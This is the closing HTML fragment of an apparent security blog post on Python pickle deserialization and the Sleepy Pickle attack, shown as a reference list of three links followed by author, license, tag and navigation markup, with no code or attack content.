<li><p><a target="_blank" rel="noopener" href="https://thesisapi.lib.nycu.edu.tw/server/api/core/bitstreams/affc3d4c-9f19-429a-b392-ce8420d7351b/content">Pain Pickle: 繞過 Python 中受限制的 Unpickler 之自動化脅迫生成</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.ithome.com.tw/news/163545">研究人員揭露針對機器學習模型而來的攻擊手法Sleepy Pickle</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://goodapple.top/archives/1069">Pickle反序列化</a></p>
</li>
</ul>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>yunshiuan</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://yunshiuan.com/2025/08/14/SleepyPickle/">https://yunshiuan.com/2025/08/14/SleepyPickle/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/Pickle/"># Pickle</a>
                    
                        <a href="/tags/Python/"># Python</a>
                    
                        <a href="/tags/Deserialization/"># Deserialization</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2025/08/14/IPAS%E8%B3%87%E5%AE%89%E5%B7%A5%E7%A8%8B%E5%B8%AB/">🎖️ IPAS 資安工程師中級筆記</a>
            
            
            <a class="next" rel="next" href="/2025/08/12/BlueTeamCheatSheet/">🛡️ BlueTeam CheatSheet</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© yunshiuan | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>